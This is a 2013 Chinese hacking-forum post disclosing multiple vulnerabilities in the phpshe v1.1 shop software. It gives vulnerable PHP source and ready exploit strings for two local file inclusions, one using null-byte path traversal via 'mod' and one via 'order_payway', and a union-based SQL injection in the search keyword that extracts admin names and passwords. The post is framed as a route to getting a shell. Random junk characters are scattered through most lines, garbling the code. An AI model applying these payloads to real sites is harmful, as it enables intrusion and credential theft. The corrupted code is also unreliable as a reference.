中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]

作者: admin    时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
6 k7 }8 W5 r* ~# d9 `* }/* Phpshe v1.1 Vulnerability
3 E9 N: q7 E& v5 W2 \) h/* ========================
9 `% f: o- j- |. [/* By: : Kn1f33 n  h: E$ Z3 m/ L  l/ _7 i6 U
/* E-Mail : 681796@qq.com7 ]1 Y  o, f7 t# m: Y: Y) w
/*******************************************************/. }' f5 v0 D* ?+ ^# c2 r8 g
0×00 整体大概参数传输
% ]4 e/ b8 r. F7 i- Y  z 2 b6 X$ H3 D5 N1 ~4 F( s
6 p8 _, e6 a& c; o; ~: R
: d/ l  M$ y: g. A, b; N
//common.php" `" v5 H! B4 {' c1 t" t4 t
if (get_magic_quotes_gpc()) {- P3 \* J# j1 ~: J. t5 q
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
4 X) m% ?4 C2 e* H# F3 z!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');$ i) ?2 C) M2 @0 G  U6 ?9 T; _# a; K
}
/ C. {, u; I/ e  Kelse {* X) V+ `3 r# f: L+ ?( m" e9 r
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');  j0 U2 A0 M/ t8 P
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');' A3 o) \( f8 E, ~. {* C( ?
}. S# i4 O2 s& |( N5 J, T
session_start();
; e0 L, I4 c2 s3 p- Q3 o( A!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
) g" `# @! Q- V" {/ \" Z7 r  {4 ^1 x!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
& W6 N2 f2 u! F3 ]1 O7 }& S
  R' W! P& R4 @6 P& Y7 O0×01 包含漏洞
9 O, C! ?" N# D& w 4 X/ L% d0 g8 @2 T6 s

- K0 S& q) r. {8 D5 e//首页文件- s) h% g4 t5 N. T2 a: T2 d7 H
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);2 v  l1 m6 U4 x, u
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞  M/ ^  n! b0 S8 Z
pe_result();
3 U1 Y5 J" ?- V6 V% }# h. E2 k?>
% h6 p( L2 R$ b& n% X0 J//common 文件 第15行开始0 f$ N# L2 o0 @/ p7 w6 n: T
url路由配置
0 Q; w  m- X2 j/ r$module = $mod = $act = 'index';- z* A7 ^0 e5 A
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
. Q! h2 {" D4 u+ i. W$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);- F# `3 @9 {. ]- t6 R( g* n$ f
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);8 V9 v- Y1 {2 A4 `: _# E' `, g/ P. n
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
$ c% U( }. P& }( x& g1 e; C$ c


6 C* q# D! O* V! s% m! S3 A. x2 ?. l
% F. U5 n/ ~3 |! P 0×02 搜索注入2 S/ z( b+ a! U# q& F* M

! J% b) w4 L+ Q' d1 N- }; e; G<code id="code2">

//product.php文件6 X6 g( S& R3 b
case 'list':" Q! }0 f2 t$ K6 j& n
$category_id = intval($id);
' U* O  c  _- H1 N$info = $db->pe_select('category', array('category_id'=>$category_id));' M2 k4 G/ R$ t( E7 P
//搜索
. N. O( F1 v) W- Z; P* v2 D' a7 o4 T# }$sqlwhere = " and `product_state` = 1";
& ~% v; R; k- {5 p& l6 _  Q) Spe_lead('hook/category.hook.php');
" I' w, h' e: Kif ($category_id) {+ B' M& Y. d# y" C, P8 K$ F" z
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";6 G" S3 y4 G. y5 P5 L1 a, C
}6 j; S7 O9 Z" A& M: R4 ]
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤2 f( x* P* Q& h6 @/ P: t
if ($_g_orderby) {
- Z9 ~+ i' q. @( B$orderby = explode('_', $_g_orderby);; p  s& N  @! o: J7 E
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
8 L% y2 v* e- j. H& }0 @* h}
0 F7 X! ?- Z/ |; Felse {8 [5 F0 e# D  K; G2 V
$sqlwhere .= " order by `product_id` desc";' b) _8 M% e  \) [/ b
}& D8 }* R; T  [5 M5 o2 y
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
2 c, l# ?% X& [' |' V1 ?5 E, H//热卖排行
0 S. x  ^0 D5 J+ Y* C4 |7 z- g. Q1 X$product_hotlist = product_hotlist();% X# M6 H& \( }/ Z1 g! l
//当前路径: w! t  `+ [: h- e% N
$nowpath = category_path($category_id);
# {7 u6 `" M& I" X4 x$seo = pe_seo($info['category_name']);
' s. y# e2 q5 u4 B* G. linclude(pe_tpl('product_list.html'));: q1 `/ s2 T+ S+ p! V- B- l
//跟进selectall函数库
0 u8 X* t5 [1 i) Epublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
/ K1 a$ f7 p* G+ m{
* v: p1 a3 F+ ~3 W9 y4 e//处理条件语句1 p/ c8 v/ M0 z2 m6 }9 ~
$sqlwhere = $this->_dowhere($where);
3 @0 e; x1 A3 _, T; P6 B& Sreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);! L) M3 p! q. G7 `* A
}4 [+ @5 m$ `9 `) b/ ?
//exp! g; M3 t% {# r5 y7 \7 P
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
5 P" D$ K" b4 s: Y6 J* ?' D  |

</code>3 ^$ v6 e6 n: S6 h

9 h2 P/ c1 w  d6 `% N  D0×03 包含漏洞2! O/ m: q, h7 L5 ]
8 d1 z. r: Z; p1 O! C
<code id="code3">

//order.php

case 'pay':


! G& I" [, j4 s! U$order_id = pe_dbhold($_g_id);

% ^' a$ V( ^0 T! Q1 O# s
$cache_payway = cache::get('payway');


3 t# W! r9 X. F+ W; Aforeach($cache_payway as $k => $v) {


  r( S# K# ~+ V4 l5 H8 Q! G$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


: m: u8 \4 [' A' C8 K. C7 v2 dif ($k == 'bank') {

6 ]' ]% n) e' G4 t  U) i% E3 L
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


5 h) H( v2 g7 ?  p' K# ?}


& v4 s) A# T3 b+ V}

. i- U' @4 u8 \/ K* Q
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


$ t: T6 |) e5 J1 q- ], w!$order['order_id'] && pe_error('订单号错误...');

! S3 T6 B; x2 O/ x, p+ ?
if (isset($_p_pesubmit)) {


# o; E5 q% D) p* m. @if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

* J7 c: V- k( \
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


- Q4 L* p; r, e6 g: Z6 jforeach ($info_list as $v) {

" J% i& t- \- A4 g9 _% H! ~" U
$order['order_name'] .= "{$v['product_name']};";* N. Y& ]$ s+ |% P


, g3 S+ Z- {, y3 [  P5 ~}

! _2 b8 c9 ~$ j. x- _
echo '正在为您连接支付网站,请稍后...';


8 T1 ?5 s. [5 }* Q5 x0 W; e- Ninclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


3 }/ y5 H4 [" I  i}//当一切准备好的时候就可以进行"鸡肋包含了"

- v- P' C2 [8 B$ N
else {

! _( C6 P2 X! V% F' e  R5 A: d
pe_error('支付错误...');


& t6 q3 G7 C6 e  ?" n' D" R}

' r* p! x* A+ \  T; w
}


* j* I8 D, j7 c8 v! Z$seo = pe_seo('选择支付方式');


3 i9 T# E2 m2 c$ O2 _include(pe_tpl('order_pay.html'));

( l3 o* ~( s" m1 O+ Z
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
5 j4 T) s" W% Jhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2